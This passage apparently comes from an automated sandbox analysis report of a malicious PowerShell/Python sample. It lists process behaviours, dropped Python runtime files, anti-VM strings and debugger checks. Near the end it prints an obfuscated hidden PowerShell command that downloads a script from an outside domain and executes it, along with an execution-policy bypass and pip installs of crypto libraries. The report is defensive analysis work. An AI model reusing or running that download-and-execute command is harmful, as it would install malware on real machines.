        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Temp\PyEnv\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Temp\PyEnv\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Temp\PyEnv\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Temp\PyEnv\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Temp\PyEnv\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Temp\PyEnv\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Temp\PyEnv\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Temp\PyEnv\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Temp\PyEnv\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Temp\PyEnv\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Temp\PyEnv\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Temp\PyEnv\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Temp\PyEnv\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Temp\PyEnv\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Temp\PyEnv\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Temp\PyEnv\python.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7FE406AA rdtsc 19_2_00007FFF7FE406AA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8778Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1092Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2043Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7781Jump to behavior
        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 1665Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\_msi.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\_queue.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\unicodedata.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\_ssl.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\_hashlib.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\_multiprocessing.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\_sqlite3.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\_socket.pydJump to dropped file
        Source: C:\Temp\PyEnv\python.exeDropped PE file which has not been started: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-arm64.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\winsound.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\select.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\sqlite3.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\_ctypes.pydJump to dropped file
        Source: C:\Temp\PyEnv\python.exeDropped PE file which has not been started: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-32.exeJump to dropped file
        Source: C:\Temp\PyEnv\python.exeDropped PE file which has not been started: C:\Temp\PyEnv\Scripts\pip3.11.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\_decimal.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\_zoneinfo.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\_asyncio.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\_elementtree.pydJump to dropped file
        Source: C:\Temp\PyEnv\python.exeDropped PE file which has not been started: C:\Temp\PyEnv\Scripts\pip3.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\_uuid.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\_lzma.pydJump to dropped file
        Source: C:\Temp\PyEnv\python.exeDropped PE file which has not been started: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\_overlapped.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\pythonw.exeJump to dropped file
        Source: C:\Temp\PyEnv\python.exeDropped PE file which has not been started: C:\Temp\PyEnv\Scripts\wheel.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\vcruntime140_1.dllJump to dropped file
        Source: C:\Temp\PyEnv\python.exeDropped PE file which has not been started: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-64.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\_bz2.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\pyexpat.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Temp\PyEnv\python3.dllJump to dropped file
        Source: C:\Temp\PyEnv\python.exeDropped PE file which has not been started: C:\Temp\PyEnv\Scripts\pip.exeJump to dropped file
        Source: C:\Temp\PyEnv\python.exeAPI coverage: 0.7 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3208Thread sleep count: 8778 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3208Thread sleep count: 1092 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3252Thread sleep time: -4611686018427385s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2532Thread sleep time: -4611686018427385s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2892Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7F442F0F GetSystemInfo,19_2_00007FFF7F442F0F
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000013.00000002.1690428797.000001CE4EA36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: powershell.exe, 00000014.00000002.2449235586.0000025F44641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
        Source: python.exe, 00000018.00000003.1991835043.0000023C74178000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %gQK66H^kcZX{J>1pQhSQTSlWe7@vjq3_MrUY$u{gBTp0045XL5u&j5sQL_^GPvMCI;LghUqliD!*LQ
        Source: python.exe, 00000018.00000003.1976661205.0000023C7443F000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.1976455491.0000023C74231000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.1991835043.0000023C74178000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: O6iLw__29OCM;fvc#;ec+Ou(<^xXvmhT+;$l_e8D(S(2K&^t}w#p48slp(aJDTEhT8hGFSpIpFw8uvR
        Source: python.exe, 00000018.00000003.2060621815.0000023C7437D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2063316044.0000023C7437E000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2081360107.0000023C7437A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2123104403.0000023C7437E000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2067241943.0000023C7437E000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2075816910.0000023C7437D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2107014994.0000023C7437E000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2116261303.0000023C7437A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2016923190.0000023C74378000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2120229856.0000023C7437E000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2027368506.0000023C74356000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: python.exe, 00000018.00000003.1991835043.0000023C74178000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 66H^kcZX{J>1pQhSQTSlWe7@vjq3_MrUY$u{gBTp0045XL5u&j5sQL_^GPvMCI;LghUqliD!*LQ
        Source: powershell.exe, 00000013.00000002.1690428797.000001CE4E9A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: python.exe, 00000018.00000003.1976661205.0000023C7443F000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.1976455491.0000023C74231000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =940*f(9aw=t3>!eo#71%EE_{Sbu?#ga%Jg1{-L+mGTvOntXW6Q`I=-&}If^)aaBN^PU^eE+Hgfslcs
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7FE406AA rdtsc 19_2_00007FFF7FE406AA
        Source: C:\Temp\PyEnv\python.exeCode function: 24_0_00007FF70C4917B8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_0_00007FF70C4917B8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Temp\PyEnv\python.exeCode function: 24_0_00007FF70C491964 SetUnhandledExceptionFilter,24_0_00007FF70C491964
        Source: C:\Temp\PyEnv\python.exeCode function: 24_0_00007FF70C4912B4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_0_00007FF70C4912B4
        Source: C:\Temp\PyEnv\python.exeCode function: 24_0_00007FF70C4917B8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_0_00007FF70C4917B8
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF806880B68 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00007FF806880B68
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF806880240 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF806880240
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068A2BC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00007FF8068A2BC0
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068A2600 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF8068A2600
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068D3CB0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00007FF8068D3CB0
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068D36E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF8068D36E0
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068FAAA8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00007FF8068FAAA8
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068FA060 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF8068FA060
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF806920AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF806920AA8
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF80C831AC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00007FF80C831AC0
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF80C8314F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF80C8314F0
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF80C891B00 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00007FF80C891B00
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF80C891530 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF80C891530

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Bypasses PowerShell execution policy
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1" Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Temp\PyEnv\python.exe "C:\Temp\PyEnv\python.exe" C:\\Temp\PyEnv\get-pip.pyJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Temp\PyEnv\python.exe "C:\Temp\PyEnv\python.exe" -m pip install pycryptodome pypiwin32Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
